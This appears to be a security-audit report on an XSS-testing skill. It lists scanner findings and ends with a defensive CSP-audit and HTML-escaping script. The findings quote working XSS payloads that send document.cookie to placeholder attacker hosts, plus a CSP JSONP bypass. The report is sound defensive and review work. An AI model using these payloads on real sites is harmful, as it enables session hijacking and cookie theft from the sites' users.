testing-for-xss-vulnerabilities
Tests web applications for XSS vulnerabilities by injecting JavaScript payloads to demonstrate client-side code execution risks.
Security score: 45/100
The testing-for-xss-vulnerabilities skill was audited on Jun 5, 2026 and we found 7 security issues across 3 threat categories, including 2 critical. Review the findings below before installing.
Security Issues

Critical, SKILL.md line 110: Eval function call - arbitrary code execution
Flagged source: - `eval()`, `setTimeout()`, `setInterval()`, `Function()`

Critical, SKILL.md line 121: Eval function call - arbitrary code execution
Flagged source: - `unsafe-eval` allows eval() and similar functions

Caveat on both critical findings: the flagged lines are Markdown bullets in the skill's documentation that name these functions (line 121 describes what the CSP keyword `unsafe-eval` permits); the scanner matched the identifiers, not an eval() call. Before treating this as critical, check whether any executable code shipped with the skill actually calls them.

Low, SKILL.md line 188: Fetch to external URL
Flagged source: <img src=x onerror="fetch('https://xsshunter.example/callback?c='+document.cookie)">

Low, SKILL.md line 98: External URL reference
Flagged source: - Use XSS Hunter payloads (`"><script src=https://yourxsshunter.xss.ht></script>`) for blind stored XSS where the payload fires in an admin panel or internal tool you cannot directly access

Low, SKILL.md line 124: External URL reference
Flagged source: - **JSONP bypass**: If CSP allows a domain with JSONP endpoints, use `<script src="https://allowed-domain.com/jsonp?callback=alert(1)"></script>`

Low, SKILL.md line 126: External URL reference
Flagged source: - Session hijacking: `<script>new Image().src="https://attacker.com/steal?c="+document.cookie</script>`

Low, SKILL.md line 188: External URL reference
Flagged source: <img src=x onerror="fetch('https://xsshunter.example/callback?c='+document.cookie)">
(Same line as the "Fetch to external URL" finding above; it is counted once per category, which is how the total reaches 7.)

Caveat on the low findings: the hosts in these payloads (`xsshunter.example`, `attacker.com`, `allowed-domain.com`, `yourxsshunter.xss.ht`) are placeholders in payload documentation, but the payloads themselves send `document.cookie` off-site. If you run them against a target, replace the host with a callback endpoint you control, otherwise session cookies from the tested application go to whatever host is left in the payload.
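As an added example (not code from the audited skill or its SKILL.md), the two checks a reviewer would want alongside these findings: a CSP audit that reports `unsafe-eval`, `unsafe-inline`, wildcard or scheme sources, and third-party hosts that need a JSONP check (the findings on lines 121 and 124), and the output encoding that makes the cookie-exfiltration payloads on lines 126 and 188 inert. The sample CSP headers, the reflected `q` parameter and the `renderResult*` functions are assumptions for illustration; the payloads are the ones quoted in the findings.

```javascript
// Added example: not part of the audited skill or its SKILL.md.
// 1. auditCsp(): parses a Content-Security-Policy header and reports the
//    weaknesses behind the findings on lines 121 and 124 ('unsafe-eval',
//    'unsafe-inline', wildcard/scheme sources, third-party hosts that must
//    be checked for JSONP endpoints before being trusted).
// 2. escapeHtml()/renderResult(): the output encoding that neutralises the
//    cookie-exfiltration payloads flagged on lines 126 and 188.
// The CSP headers, the "q" parameter and the render functions are
// constructed for illustration.

const KEYWORDS = new Set([
  "self", "none", "unsafe-inline", "unsafe-eval", "unsafe-hashes",
  "strict-dynamic", "report-sample", "wasm-unsafe-eval",
]);

// Split "name src src; name src" into { name: [src, ...] } with the
// single quotes around keyword sources removed.
function parseCsp(header) {
  const policy = {};
  for (const directive of header.split(";")) {
    const tokens = directive.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    policy[name.toLowerCase()] = sources.map((s) => s.replace(/^'(.*)'$/, "$1"));
  }
  return policy;
}

// Return a list of weaknesses in the policy that governs script loading
// (script-src, falling back to default-src as the browser does).
function auditCsp(header) {
  const policy = parseCsp(header);
  const sources = policy["script-src"] || policy["default-src"];
  const findings = [];
  if (!sources) {
    findings.push("no script-src or default-src: scripts may load from anywhere");
    return findings;
  }
  const lower = sources.map((s) => s.toLowerCase());
  const hasNonceOrHash = lower.some((s) => /^(nonce|sha(256|384|512))-/.test(s));
  if (lower.includes("unsafe-eval")) {
    findings.push("unsafe-eval: eval(), Function() and string setTimeout()/setInterval() are allowed");
  }
  if (lower.includes("unsafe-inline") && !hasNonceOrHash) {
    findings.push("unsafe-inline without nonce/hash: injected <script> and onerror= handlers execute");
  }
  for (const src of lower) {
    if (src === "*" || /^(https?|data|blob|filesystem):$/.test(src)) {
      findings.push(`wildcard/scheme source ${src}: scripts may load from any host`);
    } else if (!KEYWORDS.has(src) && !/^(nonce|sha(256|384|512))-/.test(src)) {
      findings.push(`third-party host ${src}: confirm it serves no JSONP endpoint (line 124 bypass)`);
    }
  }
  return findings;
}

// Encode the five characters that end HTML text or a quoted attribute
// value. Correct for text nodes and quoted attributes only; a URL or
// JavaScript context needs its own encoder.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// The pattern the skill's payloads exploit: a reflected query concatenated
// into markup. Hypothetical page fragment, not taken from any real app.
function renderResultVulnerable(q) {
  return `<h2>Results for ${q}</h2>`;
}

// Hardened form: encode before concatenating.
function renderResult(q) {
  return `<h2>Results for ${escapeHtml(q)}</h2>`;
}

// True if the markup contains any tag other than the template's own <h2>.
function containsInjectedTag(html) {
  return /<(?!\/?h2>)[a-z!\/]/i.test(html);
}

// Constructed sample input: the two exfiltration payloads quoted in the
// findings (lines 126 and 188) and two sample CSP headers.
const PAYLOADS = [
  `<img src=x onerror="fetch('https://xsshunter.example/callback?c='+document.cookie)">`,
  `<script>new Image().src="https://attacker.com/steal?c="+document.cookie</script>`,
];
const SAMPLE_WEAK_CSP =
  "default-src 'self'; script-src 'self' 'unsafe-eval' https://allowed-domain.com";
const SAMPLE_STRICT_CSP = "default-src 'none'; script-src 'self' 'nonce-r4nd0m'";

// Run both checks and return the results as data (printed below).
function demo() {
  return {
    weakCsp: auditCsp(SAMPLE_WEAK_CSP),
    strictCsp: auditCsp(SAMPLE_STRICT_CSP),
    payloads: PAYLOADS.map((p) => ({
      vulnerableRendersTag: containsInjectedTag(renderResultVulnerable(p)),
      hardenedRendersTag: containsInjectedTag(renderResult(p)),
    })),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

On the weak header the audit returns two entries (the `unsafe-eval` keyword and the `allowed-domain.com` host to check for JSONP) and none on the strict header; both quoted payloads produce an injected tag through the vulnerable template and none through the encoded one. The encoder is deliberately limited to HTML text and quoted-attribute contexts: a value placed inside a `<script>` block or a URL attribute needs JavaScript-string or URL encoding instead, which is exactly the gap the `onerror=` and `src=` payloads in the findings probe.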